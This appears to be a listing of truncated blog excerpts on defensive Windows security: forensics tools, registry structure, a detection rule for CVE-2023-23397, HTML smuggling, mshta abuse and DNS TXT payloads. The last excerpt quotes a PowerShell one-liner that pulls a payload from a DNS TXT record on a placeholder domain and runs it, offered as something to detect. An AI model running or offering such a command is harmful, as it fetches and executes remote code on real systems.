Adversaries may use the “whoami” command to quickly identify the current user on a compromised system, helping them assess privileges and plan further attacks. However, it’s important to note that ...

Upgrade the environment to Powershell v5 and remove prior versions where possible to add logging and restriction abilities. Enable PowerShell Logging Detection of PowerShell attack activity on you...

Windows Forensics Network Analysis Tools Wireshark Network Appliance Forensic Toolkit NetworkMiner Registry Analysis Tools RegRipper ShellBags Explorer AmcacheParser AppCompatCa...

Windows Registry Structure open Regedit.exe, he sees a tree-like structure with five root folders, or “hives”. HKEY_CLASSES_ROOT hive contains configuration information relating to which app...

Windows CVE-2023-23397 Exploitation Attempt title: CVE-2023-23397 Exploitation Attempt id: 73c59189-6a6d-4b9f-a748-8f6f9bbed75c status: experimental description: Detects outlook initiating connect...

I divided this analysis into four pieces to help us better understand the investigation flow. Email address Before investigation always drill down the email address further in 3 parts for detaile...

It presents an assortment of improved workflows for defense security, specifically addressing the areas of detection engineering, threat hunting, reverse engineering, and digital forensics. The pri...

HTML-Smuggling HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle payload past content filters and firewalls by hiding malicious payloads inside of seemingly benign...

Mshta is attractive to adversaries both in the early and latter stages of an infection because it enables them to proxy the execution of arbitrary code through a trusted utility. Process and comman...

Windows Malicious Payload in DNS Txt Attacker can put malicious payload in DNS TXT record content of domain. So, watch out for: powershell . (nslookup -q=txt some.domain.com)[-1] Curl with ca...